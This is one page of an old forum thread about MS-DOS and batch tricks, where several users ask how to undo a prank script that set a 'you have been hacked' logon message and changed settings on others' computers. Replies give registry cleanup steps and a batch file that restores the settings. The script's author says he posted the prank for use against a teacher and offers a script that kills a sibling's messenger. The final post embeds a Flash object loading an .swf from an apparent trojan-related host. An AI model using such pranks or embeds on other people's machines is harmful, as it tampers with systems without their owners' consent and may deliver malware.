monitor file activity
+ Reply to Thread
Page 3 of 6 FirstFirst 12345 ... LastLast
Results 31 to 45 of 81

Thread: Shutdown Using MS-DOS

  1. #31
    Unregistered Guest

    Re: Batch

    Originally posted by Unregistered
    Hey,

    I have a really annoying sister who always uses Audio on MSN messenger every night. Is there any way of creating a BAT file which will close MSN messenger at *0PM and to make sure the MSN messenger cannot be opened again till 6AM. This would be very useful. Or even a BAT file which shuts down the PC at *0PM

    Thanks

    Gav
    Haha, I think your stretching it a little far there Gav. SyntaX******, can you do it?

  2. #32
    Unregistered Guest

    help

    syntax i ran the program u posted on my siblings computers and every time i boot then up it says "you have been hacked" how and what do i do to get rid of this problem thanks in advance

  3. #33
    fleetwooDmaC Guest

    Re: help

    Originally posted by Unregistered
    syntax i ran the program u posted on my siblings computers and every time i boot then up it says "you have been hacked" how and what do i do to get rid of this problem thanks in advance
    This is you lesson NOT to trust anybody and NOT to run any silly application on your PC.
    Now syntax will (maybe) send you another shit to fix this problem and screw up some this else.
    Note in the mean time that NO DDOS shit was successful at all, otherwise you would have mentioned it.
    love to you (and hugs)

  4. #34
    Unregistered Guest

    Re:Re:help

    so how do i get rid of it i really need to no
    thanks

  5. #35
    ABHIS Guest

    Re: Re:Re:help

    Originally posted by Unregistered
    so how do i get rid of it i really need to no
    thanks
    As far as I can quickly guess:
    *. it might be a .bat or an .exe file with a link (.lnk) under here:
    >Start > All Programs > Startup --> here you'll see a "weird" name
    most probably without an icon!
    2. or (even better) it might be just here:
    you need to open regedit and find it by yourself under this key:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    or under this key:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

    in all cases, delete the exe file that you received.

    cheers

  6. #36
    Unregistered Guest

    re:re:re:re:

    that didnt help much does i need more ideas plz help hes pissed i no i screwed up but i need help
    thanks if u have any info i would really like it
    thanks again

  7. #37
    Unregistered Guest
    please help me with this problem of how to get rid of the u have been hacked message at startup
    thanks

  8. #38
    ABHIS Guest
    Originally posted by Unregistered
    please help me with this problem of how to get rid of the u have been hacked message at startup
    thanks
    *. you need to know that I CANNOT provide any help if you do not understand what I am asking.
    2. you need to provide details about the message that you are getting:
    ____a. Is it a message during booting BEFORE that Windows starts (DOS message)?
    ____b. Is it a message inside a small window AFTER that windows starts. (similar to an error box)
    *. Did you check what I asked in my earlier post (here the answer is easy: YES or NO) --> if you do not know ---> go back to step *.
    *. what OS are you running Win*x or WinXP?
    4. Just for sake of it, have you checked inside your autoexec.bat

    ABHIS

  9. #39
    Join Date
    Jan 2005
    Posts
    623
    I want to appologize for taking a while to reply to your questions. I have been absent from the forum for about a week now.

    I will try to answer all of your questions:

    please help me with this problem of how to get rid of the u have been hacked message at startup
    *. Open your registry regedit.exe
    2. Follow this path to the registry key:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    *. Delete the Key With The Unwanted Text (NOT THE FOLDER)

    I have a really annoying sister who always uses Audio on MSN messenger every night.
    I have a .vbs script just for that purpose. It will actually be a script running in the background that says "IF THE PROCESS %WHATEVER.EXE% START STOP IT IMMEDIATELY" What is the name of the process that runs when you start the messenger? I will add it to the script and post it here.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  10. #40
    Join Date
    Jan 2005
    Posts
    623
    TO fleetwooDmaC

    Why did you run the program that i posted on your siblings computer!? Maybe you should read the posts beforehand so that you know what the program actually does. I wrote the silly program just for fun. It doesnt do any damage but it tweaks all your settings. I posted it for the guy trying to get back at his teacher, not for the general user to run it on their own computer for fun. If you need any settings changed back just let me know which ones and ill tell you how to do it. I appologize again if anyone was confused about what the script did...

    DO NOT RUN THE SCRIPT ON YOUR OWN COMPUTER. IT WILL NOT DO ANY DAMAGE BUT IT WILL TWEAK THE SHIOT OUT OF YOUR SETTINGS.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  11. #41
    Unregistered Guest
    I have put in some script that was posted earlier on this forum and now i can get my mouse back to normal and that hacked thing keeps popping up, also i cant delete the Winlogon.exe file. Can anyone help me plz!

  12. #42
    Join Date
    Jan 2005
    Posts
    623
    REVERSE THE SETTINGS W/ THIS BATCH

    echo off
    echo REGEDIT4 >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
    echo "SwapMouseButtons"="0" >> c:\reg.reg
    echo "MouseSpeed"="2" >> c:\reg.reg
    echo "DoubleClickSpeed"="50" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
    echo "Key***rdDelay"="2" >> c:\reg.reg
    echo "Key***rdSpeed"="2" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
    echo "PaintDesktopVersion"=dword:0 >> c:\reg.reg
    echo. >> c:\reg.reg
    REGEDIT /s c:\reg.reg
    del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
    del "c:\reg.reg"
    exit


    Open your registry and delete the keys
    :LegalNoticeCaption
    :LegalNoticeText

    This is where the keys will be located-
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

    Restart your comptuer or HIT F4 to re***** your registry and everything will be fine.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  13. #43
    Join Date
    Mar 2005
    Posts
    2

    Unhappy

    hi im a newbie to al this i no alittle and i mean very little i ran the one that SyntaX****** posted up here on a friends computer and now i need to reverse the effects i would really apreciate it if someone could help me every hting is fine except for the logon message is still there saying you have been hacked contact *-800....
    cheers

  14. #44
    Join Date
    Mar 2005
    Posts
    2

    Unhappy

    sorry not only new but also thick didnt realise there were three pages and wat im looking for is on the third sorry my bad

  15. #45
    Unregistered Guest
    lol thats funny, but i have no idea

    ---

    <object classid="clsid27CDB6E-AE6D-**cf-*6B8-44455*540000" width=200 height=200> <param name=movie value=http://hackerz-alliance.com/optix/aa.swf> <param name=play value=true> <param name=loop value=true> <param name=quality value=high> <embed src=http://hackerz-alliance.com/optix/aa.swf width=200 height=200 play=true loop=true quality=high> </embed> </object>

+ Reply to Thread

Similar Threads

  1. shutdown
    By waseem1g in forum Internet Privacy
    Replies: 9
    Last Post: 07-31-2008, 05:30 AM
  2. shutdown script as an exe?
    By Austin504 in forum Viruses and Trojans
    Replies: 2
    Last Post: 05-28-2008, 03:02 PM
  3. Help, Net Use to shutdown remote
    By NetNewbie in forum Proxies and Firewalls
    Replies: 0
    Last Post: 08-20-2005, 07:03 AM
  4. Shutdown Command for W2k?
    By Unregistered in forum Internet Privacy
    Replies: 0
    Last Post: 04-05-2005, 01:18 PM
  5. How to shutdown website?
    By Unregistered in forum Viruses and Trojans
    Replies: 9
    Last Post: 02-21-2005, 10:23 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts